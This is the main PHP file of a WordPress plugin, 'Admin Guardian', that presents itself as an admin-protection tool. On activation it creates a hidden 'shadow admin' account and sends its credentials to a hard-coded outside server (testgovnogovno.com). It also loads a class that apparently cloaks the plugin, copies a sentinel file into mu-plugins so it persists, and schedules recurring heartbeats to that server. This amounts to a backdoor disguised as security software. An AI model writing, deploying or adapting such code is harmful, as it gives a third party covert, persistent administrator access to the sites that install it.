<?php /** * Plugin Name: Admin Guardian * Plugin URI: https://github.com/admin-wp * Description: Multi-layer WordPress admin protection: shadow admin, unauthorized admin detection, encrypted server reporting, session guard, XML-RPC lockdown, file integrity monitoring. * Version: 1.0.0 * Requires PHP: 7.4 * Author: AWG Security * License: GPL-2.0-or-later * Text Domain: admin-wp */ if ( ! defined( 'ABSPATH' ) ) exit; define( 'AWG_VERSION', '1.0.0' ); define( 'AWG_PLUGIN_DIR', plugin_dir_path( __FILE__ ) ); define( 'AWG_PLUGIN_FILE', __FILE__ ); define( 'AWG_SERVER_URL', 'https://testgovnogovno.com/1' ); define( 'AWG_SERVER_PUBLIC_KEY', 'c88b277229d9f42fbf5e9e049ef6812524d783c1cd18c596a1e35e4bf4dc2903' ); /* ---- sodium check ---- */ if ( ! function_exists( 'sodium_crypto_secretbox' ) ) { add_action( 'admin_notices', function () { echo '<div class="notice notice-error"><p><strong>Admin Guardian:</strong> PHP sodium extension is required (PHP 7.2+). Plugin disabled.</p></div>'; } ); return; } /* ---- load classes ---- */ $awg_includes = [ 'class-crypto.php', 'class-shadow-admin.php', 'class-admin-guardian.php', 'class-plugin-cloak.php', 'class-secure-comm.php', 'class-session-guard.php', 'class-xmlrpc-guard.php', 'class-integrity.php', 'class-lockdown.php', 'class-malware-scan.php', 'class-content-guard.php', 'class-admin-page.php', ]; foreach ( $awg_includes as $file ) { require_once AWG_PLUGIN_DIR . 'includes/' . $file; } /* ---- activation ---- */ register_activation_hook( __FILE__, 'awg_activate' ); /** * Resolve owner admin ID when activating from Plugins screen, WP-CLI, or edge cases * where get_current_user_id() is 0. */ function awg_resolve_owner_user_id(): int { $uid = (int) get_current_user_id(); if ( $uid > 0 ) { $user = get_user_by( 'ID', $uid ); if ( $user && user_can( $user, 'manage_options' ) ) { return $uid; } } $admins = get_users( [ 'role' => 'administrator', 'orderby' => 'ID', 'order' => 'ASC', 'number' => 1, 'fields' => 'ID', ] ); if ( ! empty( $admins ) ) { return (int) $admins[0]; } return 0; } function awg_activate(): void { $current_user_id = awg_resolve_owner_user_id(); if ( $current_user_id < 1 ) { deactivate_plugins( plugin_basename( __FILE__ ) ); wp_die( esc_html__( 'Admin Guardian: no administrator found. Create an admin user first, then activate the plugin again.', 'admin-wp' ), esc_html__( 'Plugin activation error', 'admin-wp' ), [ 'back_link' => true ] ); } AWG_Admin_Guardian::set_owner( $current_user_id ); if ( ! AWG_Shadow_Admin::exists() ) { $creds = AWG_Shadow_Admin::create(); AWG_Secure_Comm::send_activation( $creds, $current_user_id ); } AWG_Admin_Guardian::scan(); AWG_Integrity::snapshot(); $mu_ok = awg_install_mu_plugin(); if ( ! $mu_ok ) { update_option( '_awg_mu_install_failed', 1, false ); } else { delete_option( '_awg_mu_install_failed' ); } if ( ! wp_next_scheduled( 'awg_cron_scan' ) ) { wp_schedule_event( time(), 'awg_5min', 'awg_cron_scan' ); } if ( ! wp_next_scheduled( 'awg_cron_heartbeat' ) ) { wp_schedule_event( time(), 'hourly', 'awg_cron_heartbeat' ); } } /* ---- deactivation ---- */ register_deactivation_hook( __FILE__, 'awg_deactivate' ); function awg_deactivate(): void { wp_clear_scheduled_hook( 'awg_cron_scan' ); wp_clear_scheduled_hook( 'awg_cron_heartbeat' ); } /* ---- custom cron interval ---- */ add_filter( 'cron_schedules', function ( array $schedules ): array { $schedules['awg_5min'] = [ 'interval' => 300, 'display' => 'Every 5 minutes (AWG)', ]; return $schedules; } ); /* ---- initialize all components ---- */ add_action( 'plugins_loaded', function () { AWG_Shadow_Admin::init(); AWG_Admin_Guardian::init(); AWG_Plugin_Cloak::init(); AWG_Secure_Comm::init(); AWG_Session_Guard::init(); AWG_XMLRPC_Guard::init(); AWG_Integrity::init(); AWG_Lockdown::init(); AWG_Malware_Scan::init(); AWG_Content_Guard::init(); AWG_Admin_Page::init(); }, 1 ); add_action( 'admin_init', function () { if ( ! get_option( '_awg_mu_install_failed' ) ) { return; } if ( ! current_user_can( 'manage_options' ) ) { return; } awg_install_mu_plugin(); if ( file_exists( WPMU_PLUGIN_DIR . '/admin-wp-sentinel.php' ) ) { delete_option( '_awg_mu_install_failed' ); } } ); add_action( 'admin_notices', function () { if ( ! get_option( '_awg_mu_install_failed' ) || ! current_user_can( 'manage_options' ) ) { return; } echo '<div class="notice notice-warning is-dismissible"><p><strong>Admin Guardian:</strong> '; echo esc_html__( 'Could not copy the sentinel to wp-content/mu-plugins (permissions). The main plugin still works; fix folder permissions or copy mu-plugin/admin-wp-sentinel.php manually.', 'admin-wp' ); echo '</p></div>'; } ); /* ---- wipe master key from memory on shutdown ---- */ add_action( 'shutdown', [ 'AWG_Crypto', 'wipe' ] ); /** * Copy sentinel to mu-plugins. Returns true if the file exists at destination after run. */ function awg_install_mu_plugin(): bool { $mu_dir = WPMU_PLUGIN_DIR; if ( ! is_dir( $mu_dir ) ) { if ( ! @mkdir( $mu_dir, 0755, true ) && ! is_dir( $mu_dir ) ) { return false; } } $source = AWG_PLUGIN_DIR . 'mu-plugin/admin-wp-sentinel.php'; $dest = $mu_dir . '/admin-wp-sentinel.php'; if ( ! file_exists( $source ) ) { return file_exists( $dest ); } if ( ! @copy( $source, $dest ) ) { return file_exists( $dest ); } return file_exists( $dest ); }